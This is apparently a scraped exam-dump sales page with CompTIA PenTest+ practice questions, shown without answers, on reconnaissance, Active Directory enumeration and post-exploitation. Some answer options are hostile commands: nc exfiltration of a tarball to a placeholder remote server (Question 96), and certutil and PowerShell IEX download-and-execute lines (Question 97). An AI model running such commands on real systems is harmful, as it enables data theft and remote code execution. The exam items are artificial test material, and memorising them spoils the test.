A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?

Options:

A.

Enumerating cached pages available on web pages

B.

Looking for externally available services

C.

Scanning for exposed ports associated with the domain

D.

Searching for vulnerabilities and potential exploits

Buy Now
Questions 94

A penetration tester exports the following CSV data from a scanner. The tester wants to parse the data using Bash and input it into another tool.

CSV data before parsing:

cat data.csv

Host, IP, Username, Password

WINS212, 10.111.41.74, admin, Spring11

HRDB, 10.13.9.212, hradmin, HRForTheWin

WAS01, 192.168.23.13, admin, Snowfall97

Intended output:

admin Spring11

hradmin HRForTheWin

admin Snowfall97

Which of the following will provide the intended output?

Options:

A.

cat data.csv | grep -v " IP " | cut -d " , " -f 3,4 | sed -e ' s/,/ / '

B.

cat data.csv | find . -iname Username,Password

C.

cat data.csv | grep ' username|Password '

D.

cat data.csv | grep -i " admin " | grep -v " WINS212\|HRDB\|WAS01\|10.111.41.74\|10.13.9.212\|192.168.23.13 "

Buy Now
Questions 95

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester

B.

Shodan

C.

Amass

D.

Nmap

Buy Now
Questions 96

A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

Action | SRC

| DEST

| --

Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP

Block | . | . | *

Which of the following commands should the tester try next?

Options:

A.

tar -zcvf /tmp/data.tar.gz /path/to/data & & nc -w 3 < remote_server > 443 < /tmp/data.tar.gz

B.

gzip /path/to/data & & cp data.gz < remote_server > 443

C.

gzip /path/to/data & & nc -nvlk 443; cat data.gz ' nc -w 3 < remote_server > 22

D.

tar -zcvf /tmp/data.tar.gz /path/to/data & & scp /tmp/data.tar.gz < remote_server >

Buy Now
Questions 97

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring( " http://172.16.0.1/ " )

D.

rundll32.exe c:\path\foo.dll,functName

Buy Now
Questions 98

A penetration tester would like to collect permission details for objects within the domain. The tester has a valid AD user and access to an internal PC. Which of the following sets of steps is the best way for the tester to accomplish the desired outcome?

Options:

A.

Escalate privileges.Execute Rubeus.Run a Cypher query on Rubeus to get the results.

B.

Run SharpHound.Install CrackMapExec.Perform a CrackMapExec database query on CME to get the results.

C.

Run SharpHoundInstall BloodHoundPerform a Cypher query on BloodHound to get the results.

D.

Escalate privileges.Get Windows Registry data.Perform a query to get results.

Buy Now
Questions 99

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Buy Now
Questions 100

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Removing persistence mechanisms

B.

Uninstalling tools

C.

Preserving artifacts

D.

Reverting configuration changes

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Jul 6, 2026
Questions: 336

PDF + Testing Engine

$49.5  $164.99

Testing Engine

$37.5  $124.99
buy now PT0-003 testing engine

PDF (Q&A)

$31.5  $104.99
buy now PT0-003 pdf
dumpsmate guaranteed to pass

24/7 Customer Support

DumpsMate's team of experts is always available to respond your queries on exam preparation. Get professional answers on any topic of the certification syllabus. Our experts will thoroughly satisfy you.

Site Secure

mcafee secure

TESTED 06 Jul 2026